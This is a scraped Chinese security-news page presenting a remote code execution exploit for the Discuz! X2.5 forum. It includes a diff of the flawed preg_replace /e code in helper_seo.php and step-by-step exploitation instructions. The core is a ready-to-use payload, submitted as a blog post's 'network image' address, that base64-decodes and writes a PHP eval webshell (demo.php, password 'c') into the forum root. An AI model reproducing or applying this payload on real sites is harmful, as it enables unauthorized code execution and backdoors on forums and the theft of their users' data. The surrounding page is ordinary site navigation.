discuz! x2.5
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
Discuz! X2.5 远程代码执行漏洞及EXP[XDAY] 匿名用户2012-04-28共217213人围观 ,发现 1 个不明物体 漏洞
if(!defined('IN_DISCUZ')) {
@@ -89,7 +89,7 @@}
}
if($searcharray && $replacearray) {
- $content = preg_replace("/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies", 'helper_seo::base64_transform("encode", "", "\\1\\2\\3", "")', $content);
+ $content = preg_replace("/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies", "helper_seo::base64_transform('encode', '', '\\1\\2\\3', '')", $content);
$content = preg_replace($searcharray, $replacearray, $content, 1);
$content = preg_replace("/(.*?)/ies", "helper_seo::base64_transform('decode', '', '\\1', '')", $content);
}
@@ -100,7 +100,7 @@
public static function base64_transform($type, $prefix, $string, $suffix) {
if($type == 'encode') {
- return $prefix.base64_encode(str_replace("\'", "'", $string)).$suffix; // - -
+ return $prefix.base64_encode(str_replace("\\\"", "\"", $string)).$suffix;
} elseif($type == 'decode') {
return $prefix.base64_decode($string).$suffix;
}
够清楚吧,问题在/source/class/helper/helper_seo.php 92行附近的:
$content = preg_replace(“/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies”, ‘helper_seo::base64_transform(“encode”, ““, “\\1\\2\\3″, ““)’, $content);
preg_replace 使用了e修正符,又是双引号,所以导致远程任意代码执行。
需要论坛支持个功能,啥功能看68行 $_G['cache']['relatedlink'],grep下relatedlink一路跟,具体代码先不贴,找到需要后台开个seo功能,在运营-关联链接 /admin.php?frames=yes&action=misc&operation=relatedlink,且至少需要设置一个链接,这功能不是所有管理员都开,但是我觉得大部分都会开,如果不开,它就只能是个后台拿shell的tips了。
function_core.php 1925
function parse_related_link($content, $extent) {
return helper_seo::parse_related_link($content, $extent);
}
看正则
"/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies"
利用方式: 1.注册任意账户
2.登陆用户,发表blog日志(注意是日志)
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
4.访问日志,论坛根目录下生成demo.php,一句发密码c
感谢会员char投递
来源:http://www.zhu.cm/discuz-x2-5-getwebshell-exp-xday.html
匿名用户
660 篇文章
等级: 4级
||
上一篇:本篇已是最后文章下一篇:Windows 8 DEP bypass
发表评论已有 1 条评论
tester 2015-06-25回复 1楼
什么是xday?
亮了(2)
昵称
请输入昵称
必须您当前尚未登录。登陆?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
匿名用户
这是一个神奇的马甲
660
文章数
0
评论数
最近文章
北京14岁极客发明神奇眼罩可控制梦境(视频)
2013.09.13
苹果透露更多Touch ID的安全细节
2013.09.12
针对亚马逊云服务器(AWS)的渗透测试工具——Nimbostratus
2013.09.11
浏览更多
相关阅读
ANDRAX:最新的Android智能手机上的渗透测试平台用于渗透测试WordPress的Ruby框架:WordPress Exploit FrameworkdSploit—Android网络渗透套件测试小记(含视频)Burp Suite扫描器漏洞扫描功能介绍及简单教程如何使用SecGen随机生成漏洞靶机?
特别推荐
关注我们 分享每日精选文章
活动预告
11月
FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月
【16课时-连载中】挖掘CVE不是梦(系列课程2)
已结束
10月
【首节课仅需1元】挖掘CVE不是梦
已结束
9月
【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php 正在加载中...0daybank
文章评论